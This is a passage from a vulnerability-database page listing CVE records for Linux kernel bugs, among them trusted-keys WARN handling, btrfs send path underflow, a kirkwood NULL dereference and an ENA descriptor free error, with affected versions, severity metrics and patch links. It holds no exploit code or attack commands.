                "timestamp": "2024-09-10T17:15:22.914846Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:34:58.690Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "security/keys/trusted-keys/trusted_tpm2.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "96f650995c70237b061b497c66755e32908f8972",
              "status": "affected",
              "version": "f2219745250f388edacabe6cca73654131c67d0a",
              "versionType": "git"
            },
            {
              "lessThan": "681935009fec3fc22af97ee312d4a24ccf3cf087",
              "status": "affected",
              "version": "f2219745250f388edacabe6cca73654131c67d0a",
              "versionType": "git"
            },
            {
              "lessThan": "1c652e1e10676f942149052d9329b8bf2703529a",
              "status": "affected",
              "version": "f2219745250f388edacabe6cca73654131c67d0a",
              "versionType": "git"
            },
            {
              "lessThan": "d32c6e09f7c4bec3ebc4941323f0aa6366bc1487",
              "status": "affected",
              "version": "f2219745250f388edacabe6cca73654131c67d0a",
              "versionType": "git"
            },
            {
              "lessThan": "ff91cc12faf798f573dab2abc976c1d5b1862fea",
              "status": "affected",
              "version": "f2219745250f388edacabe6cca73654131c67d0a",
              "versionType": "git"
            },
            {
              "lessThan": "050bf3c793a07f96bd1e2fd62e1447f731ed733b",
              "status": "affected",
              "version": "f2219745250f388edacabe6cca73654131c67d0a",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "security/keys/trusted-keys/trusted_tpm2.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.13"
            },
            {
              "lessThan": "5.13",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.160",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.92",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.32",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.11",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.2",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.160",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.92",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.32",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.11",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.2",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.13",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nKEYS: trusted: Do not use WARN when encode fails\n\nWhen asn1_encode_sequence() fails, WARN is not the correct solution.\n\n1. asn1_encode_sequence() is not an internal function (located\n   in lib/asn1_encode.c).\n2. Location is known, which makes the stack trace useless.\n3. Results a crash if panic_on_warn is set.\n\nIt is also noteworthy that the use of WARN is undocumented, and it\nshould be avoided unless there is a carefully considered rationale to\nuse it.\n\nReplace WARN with pr_err, and print the return value instead, which is\nonly useful piece of information."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T09:13:11.226Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/96f650995c70237b061b497c66755e32908f8972"
        },
        {
          "url": "https://git.kernel.org/stable/c/681935009fec3fc22af97ee312d4a24ccf3cf087"
        },
        {
          "url": "https://git.kernel.org/stable/c/1c652e1e10676f942149052d9329b8bf2703529a"
        },
        {
          "url": "https://git.kernel.org/stable/c/d32c6e09f7c4bec3ebc4941323f0aa6366bc1487"
        },
        {
          "url": "https://git.kernel.org/stable/c/ff91cc12faf798f573dab2abc976c1d5b1862fea"
        },
        {
          "url": "https://git.kernel.org/stable/c/050bf3c793a07f96bd1e2fd62e1447f731ed733b"
        }
      ],
      "title": "KEYS: trusted: Do not use WARN when encode fails",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-36975",
    "datePublished": "2024-06-18T19:20:24.553Z",
    "dateReserved": "2024-05-30T15:25:07.082Z",
    "dateUpdated": "2025-05-04T09:13:11.226Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35935 (GCVE-0-2024-35935)

Vulnerability from cvelistv5 – Published: 2024-05-19 10:10 – Updated: 2026-01-05 10:35

Title

btrfs: send: handle path ref underflow in header iterate_inode_ref()

Summary

In the Linux kernel, the following vulnerability has been resolved: btrfs: send: handle path ref underflow in header iterate_inode_ref() Change BUG_ON to proper error handling if building the path buffer fails. The pointers are not printed so we don't accidentally leak kernel addresses.

Severity ?

No CVSS data available.

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/be2b6bcc936ae17f4…
	https://git.kernel.org/stable/c/024529c27c8b4b273…
	https://git.kernel.org/stable/c/4720d590c4cb5d9ff…
	https://git.kernel.org/stable/c/2f6174fd4ccf403b4…
	https://git.kernel.org/stable/c/9ae356c627b493323…
	https://git.kernel.org/stable/c/c1363ed8867b81ea1…
	https://git.kernel.org/stable/c/03938619a1e718b61…
	https://git.kernel.org/stable/c/3c6ee34c6f9cd1280…

Impacted products

Vendor

Product

Version

Linux

Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < be2b6bcc936ae17f42fff6494106a5660b35d8d3 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 024529c27c8b4b273325a169e078337c8279e229 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 4720d590c4cb5d9ffa0060b89743651cc7e995f9 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 9ae356c627b493323e1433dcb27a26917668c07c (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < c1363ed8867b81ea169fba2ccc14af96a85ed183 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 03938619a1e718b6168ae4528e1b0f979293f1a5 (git)
Affected: 31db9f7c23fbf7e95026143f79645de6507b583b , < 3c6ee34c6f9cd12802326da26631232a61743501 (git)

Linux

Affected: 3.6
Unaffected: 0 , < 3.6 (semver)
Unaffected: 4.19.312 , ≤ 4.19.* (semver)
Unaffected: 5.4.274 , ≤ 5.4.* (semver)
Unaffected: 5.10.215 , ≤ 5.10.* (semver)
Unaffected: 5.15.155 , ≤ 5.15.* (semver)
Unaffected: 6.1.86 , ≤ 6.1.* (semver)
Unaffected: 6.6.27 , ≤ 6.6.* (semver)
Unaffected: 6.8.6 , ≤ 6.8.* (semver)
Unaffected: 6.9 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T03:21:49.026Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/be2b6bcc936ae17f42fff6494106a5660b35d8d3"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/024529c27c8b4b273325a169e078337c8279e229"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/4720d590c4cb5d9ffa0060b89743651cc7e995f9"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/9ae356c627b493323e1433dcb27a26917668c07c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/c1363ed8867b81ea169fba2ccc14af96a85ed183"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/03938619a1e718b6168ae4528e1b0f979293f1a5"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/3c6ee34c6f9cd12802326da26631232a61743501"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
          }
        ],
        "title": "CVE Program Container"
      },
      {
        "metrics": [
          {
            "other": {
              "content": {
                "id": "CVE-2024-35935",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-09-10T15:40:55.413538Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-09-11T17:33:15.162Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/send.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "be2b6bcc936ae17f42fff6494106a5660b35d8d3",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "024529c27c8b4b273325a169e078337c8279e229",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "4720d590c4cb5d9ffa0060b89743651cc7e995f9",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "9ae356c627b493323e1433dcb27a26917668c07c",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "c1363ed8867b81ea169fba2ccc14af96a85ed183",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "03938619a1e718b6168ae4528e1b0f979293f1a5",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            },
            {
              "lessThan": "3c6ee34c6f9cd12802326da26631232a61743501",
              "status": "affected",
              "version": "31db9f7c23fbf7e95026143f79645de6507b583b",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "fs/btrfs/send.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "3.6"
            },
            {
              "lessThan": "3.6",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "4.19.*",
              "status": "unaffected",
              "version": "4.19.312",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.4.*",
              "status": "unaffected",
              "version": "5.4.274",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.10.*",
              "status": "unaffected",
              "version": "5.10.215",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.155",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.86",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.27",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.6",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.9",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "4.19.312",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.4.274",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.10.215",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.155",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.86",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.27",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.6",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9",
                  "versionStartIncluding": "3.6",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nbtrfs: send: handle path ref underflow in header iterate_inode_ref()\n\nChange BUG_ON to proper error handling if building the path buffer\nfails. The pointers are not printed so we don\u0027t accidentally leak kernel\naddresses."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2026-01-05T10:35:50.768Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/be2b6bcc936ae17f42fff6494106a5660b35d8d3"
        },
        {
          "url": "https://git.kernel.org/stable/c/024529c27c8b4b273325a169e078337c8279e229"
        },
        {
          "url": "https://git.kernel.org/stable/c/4720d590c4cb5d9ffa0060b89743651cc7e995f9"
        },
        {
          "url": "https://git.kernel.org/stable/c/2f6174fd4ccf403b42b3d5f0d1b6b496a0e5330a"
        },
        {
          "url": "https://git.kernel.org/stable/c/9ae356c627b493323e1433dcb27a26917668c07c"
        },
        {
          "url": "https://git.kernel.org/stable/c/c1363ed8867b81ea169fba2ccc14af96a85ed183"
        },
        {
          "url": "https://git.kernel.org/stable/c/03938619a1e718b6168ae4528e1b0f979293f1a5"
        },
        {
          "url": "https://git.kernel.org/stable/c/3c6ee34c6f9cd12802326da26631232a61743501"
        }
      ],
      "title": "btrfs: send: handle path ref underflow in header iterate_inode_ref()",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-35935",
    "datePublished": "2024-05-19T10:10:42.319Z",
    "dateReserved": "2024-05-17T13:50:33.130Z",
    "dateUpdated": "2026-01-05T10:35:50.768Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2"
}

CVE-2024-38550 (GCVE-0-2024-38550)

Vulnerability from cvelistv5 – Published: 2024-06-19 13:35 – Updated: 2025-05-04 12:56

Title

ASoC: kirkwood: Fix potential NULL dereference

Summary

In the Linux kernel, the following vulnerability has been resolved: ASoC: kirkwood: Fix potential NULL dereference In kirkwood_dma_hw_params() mv_mbus_dram_info() returns NULL if CONFIG_PLAT_ORION macro is not defined. Fix this bug by adding NULL check. Found by Linux Verification Center (linuxtesting.org) with SVACE.

Severity ?

4.4 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-476 - NULL Pointer Dereference

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/d48d0c5fd733bd6d8…
	https://git.kernel.org/stable/c/de9987cec6fde1dd4…
	https://git.kernel.org/stable/c/1a7254525ca7a6f3e…
	https://git.kernel.org/stable/c/5bf5154739cd676b6…
	https://git.kernel.org/stable/c/802b49e39da669b54…
	https://git.kernel.org/stable/c/ea60ab95723f5738e…

Impacted products

Vendor

Product

Version

Linux

Affected: bb6a40fc5a830cae45ddd5cd6cfa151b008522ed , < d48d0c5fd733bd6d8d3ddb2ed553777ab4724169 (git)
Affected: bb6a40fc5a830cae45ddd5cd6cfa151b008522ed , < de9987cec6fde1dd41dfcb971433e05945852489 (git)
Affected: bb6a40fc5a830cae45ddd5cd6cfa151b008522ed , < 1a7254525ca7a6f3e37d7882d7f7ad97f6235f7c (git)
Affected: bb6a40fc5a830cae45ddd5cd6cfa151b008522ed , < 5bf5154739cd676b6d0958079070557c8d96afb6 (git)
Affected: bb6a40fc5a830cae45ddd5cd6cfa151b008522ed , < 802b49e39da669b54bd9b77dc3c649999a446bf6 (git)
Affected: bb6a40fc5a830cae45ddd5cd6cfa151b008522ed , < ea60ab95723f5738e7737b56dda95e6feefa5b50 (git)
Affected: 145951900b763dc32bf31bd770f3f036a8348424 (git)

Linux

Affected: 5.14
Unaffected: 0 , < 5.14 (semver)
Unaffected: 5.15.161 , ≤ 5.15.* (semver)
Unaffected: 6.1.93 , ≤ 6.1.* (semver)
Unaffected: 6.6.33 , ≤ 6.6.* (semver)
Unaffected: 6.8.12 , ≤ 6.8.* (semver)
Unaffected: 6.9.3 , ≤ 6.9.* (semver)
Unaffected: 6.10 , ≤ * (original_commit_for_fix)

Show details on NVD website

JSON

To clipboard

{
  "containers": {
    "adp": [
      {
        "metrics": [
          {
            "cvssV3_1": {
              "attackComplexity": "LOW",
              "attackVector": "LOCAL",
              "availabilityImpact": "HIGH",
              "baseScore": 4.4,
              "baseSeverity": "MEDIUM",
              "confidentialityImpact": "NONE",
              "integrityImpact": "NONE",
              "privilegesRequired": "HIGH",
              "scope": "UNCHANGED",
              "userInteraction": "NONE",
              "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:N/I:N/A:H",
              "version": "3.1"
            }
          },
          {
            "other": {
              "content": {
                "id": "CVE-2024-38550",
                "options": [
                  {
                    "Exploitation": "none"
                  },
                  {
                    "Automatable": "no"
                  },
                  {
                    "Technical Impact": "partial"
                  }
                ],
                "role": "CISA Coordinator",
                "timestamp": "2024-06-20T15:41:30.404959Z",
                "version": "2.0.3"
              },
              "type": "ssvc"
            }
          }
        ],
        "problemTypes": [
          {
            "descriptions": [
              {
                "cweId": "CWE-476",
                "description": "CWE-476 NULL Pointer Dereference",
                "lang": "en",
                "type": "CWE"
              }
            ]
          }
        ],
        "providerMetadata": {
          "dateUpdated": "2024-11-01T15:00:22.177Z",
          "orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "shortName": "CISA-ADP"
        },
        "title": "CISA ADP Vulnrichment"
      },
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-02T04:12:25.668Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/d48d0c5fd733bd6d8d3ddb2ed553777ab4724169"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/de9987cec6fde1dd41dfcb971433e05945852489"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/1a7254525ca7a6f3e37d7882d7f7ad97f6235f7c"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/5bf5154739cd676b6d0958079070557c8d96afb6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/802b49e39da669b54bd9b77dc3c649999a446bf6"
          },
          {
            "tags": [
              "x_transferred"
            ],
            "url": "https://git.kernel.org/stable/c/ea60ab95723f5738e7737b56dda95e6feefa5b50"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "defaultStatus": "unaffected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/kirkwood/kirkwood-dma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "lessThan": "d48d0c5fd733bd6d8d3ddb2ed553777ab4724169",
              "status": "affected",
              "version": "bb6a40fc5a830cae45ddd5cd6cfa151b008522ed",
              "versionType": "git"
            },
            {
              "lessThan": "de9987cec6fde1dd41dfcb971433e05945852489",
              "status": "affected",
              "version": "bb6a40fc5a830cae45ddd5cd6cfa151b008522ed",
              "versionType": "git"
            },
            {
              "lessThan": "1a7254525ca7a6f3e37d7882d7f7ad97f6235f7c",
              "status": "affected",
              "version": "bb6a40fc5a830cae45ddd5cd6cfa151b008522ed",
              "versionType": "git"
            },
            {
              "lessThan": "5bf5154739cd676b6d0958079070557c8d96afb6",
              "status": "affected",
              "version": "bb6a40fc5a830cae45ddd5cd6cfa151b008522ed",
              "versionType": "git"
            },
            {
              "lessThan": "802b49e39da669b54bd9b77dc3c649999a446bf6",
              "status": "affected",
              "version": "bb6a40fc5a830cae45ddd5cd6cfa151b008522ed",
              "versionType": "git"
            },
            {
              "lessThan": "ea60ab95723f5738e7737b56dda95e6feefa5b50",
              "status": "affected",
              "version": "bb6a40fc5a830cae45ddd5cd6cfa151b008522ed",
              "versionType": "git"
            },
            {
              "status": "affected",
              "version": "145951900b763dc32bf31bd770f3f036a8348424",
              "versionType": "git"
            }
          ]
        },
        {
          "defaultStatus": "affected",
          "product": "Linux",
          "programFiles": [
            "sound/soc/kirkwood/kirkwood-dma.c"
          ],
          "repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
          "vendor": "Linux",
          "versions": [
            {
              "status": "affected",
              "version": "5.14"
            },
            {
              "lessThan": "5.14",
              "status": "unaffected",
              "version": "0",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "5.15.*",
              "status": "unaffected",
              "version": "5.15.161",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.1.*",
              "status": "unaffected",
              "version": "6.1.93",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.6.*",
              "status": "unaffected",
              "version": "6.6.33",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.8.*",
              "status": "unaffected",
              "version": "6.8.12",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "6.9.*",
              "status": "unaffected",
              "version": "6.9.3",
              "versionType": "semver"
            },
            {
              "lessThanOrEqual": "*",
              "status": "unaffected",
              "version": "6.10",
              "versionType": "original_commit_for_fix"
            }
          ]
        }
      ],
      "cpeApplicability": [
        {
          "nodes": [
            {
              "cpeMatch": [
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "5.15.161",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.1.93",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.6.33",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.8.12",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.9.3",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionEndExcluding": "6.10",
                  "versionStartIncluding": "5.14",
                  "vulnerable": true
                },
                {
                  "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
                  "versionStartIncluding": "5.13.12",
                  "vulnerable": true
                }
              ],
              "negate": false,
              "operator": "OR"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nASoC: kirkwood: Fix potential NULL dereference\n\nIn kirkwood_dma_hw_params() mv_mbus_dram_info() returns NULL if\nCONFIG_PLAT_ORION macro is not defined.\nFix this bug by adding NULL check.\n\nFound by Linux Verification Center (linuxtesting.org) with SVACE."
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2025-05-04T12:56:42.047Z",
        "orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
        "shortName": "Linux"
      },
      "references": [
        {
          "url": "https://git.kernel.org/stable/c/d48d0c5fd733bd6d8d3ddb2ed553777ab4724169"
        },
        {
          "url": "https://git.kernel.org/stable/c/de9987cec6fde1dd41dfcb971433e05945852489"
        },
        {
          "url": "https://git.kernel.org/stable/c/1a7254525ca7a6f3e37d7882d7f7ad97f6235f7c"
        },
        {
          "url": "https://git.kernel.org/stable/c/5bf5154739cd676b6d0958079070557c8d96afb6"
        },
        {
          "url": "https://git.kernel.org/stable/c/802b49e39da669b54bd9b77dc3c649999a446bf6"
        },
        {
          "url": "https://git.kernel.org/stable/c/ea60ab95723f5738e7737b56dda95e6feefa5b50"
        }
      ],
      "title": "ASoC: kirkwood: Fix potential NULL dereference",
      "x_generator": {
        "engine": "bippy-1.2.0"
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
    "assignerShortName": "Linux",
    "cveId": "CVE-2024-38550",
    "datePublished": "2024-06-19T13:35:22.716Z",
    "dateReserved": "2024-06-18T19:36:34.920Z",
    "dateUpdated": "2025-05-04T12:56:42.047Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2024-35958 (GCVE-0-2024-35958)

Vulnerability from cvelistv5 – Published: 2024-05-20 09:41 – Updated: 2025-05-04 09:09

Title

net: ena: Fix incorrect descriptor free behavior

Summary

In the Linux kernel, the following vulnerability has been resolved: net: ena: Fix incorrect descriptor free behavior ENA has two types of TX queues: - queues which only process TX packets arriving from the network stack - queues which only process TX packets forwarded to it by XDP_REDIRECT or XDP_TX instructions The ena_free_tx_bufs() cycles through all descriptors in a TX queue and unmaps + frees every descriptor that hasn't been acknowledged yet by the device (uncompleted TX transactions). The function assumes that the processed TX queue is necessarily from the first category listed above and ends up using napi_consume_skb() for descriptors belonging to an XDP specific queue. This patch solves a bug in which, in case of a VF reset, the descriptors aren't freed correctly, leading to crashes.

Severity ?

5.5 (Medium)


                        
                          CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

CWE

CWE-noinfo Not enough information

Assigner

Linux

References

URL

Tags

	https://git.kernel.org/stable/c/b26aa765f7437e1bb…
	https://git.kernel.org/stable/c/fdfbf54d128ab6ab2…
	https://git.kernel.org/stable/c/19ff8fed3338898b7…
	https://git.kernel.org/stable/c/5c7f2240d9835a782…
	https://git.kernel.org/stable/c/c31baa07f01307b7a…
	https://git.kernel.org/stable/c/bf02d9fe00632d22f…

Impacted products
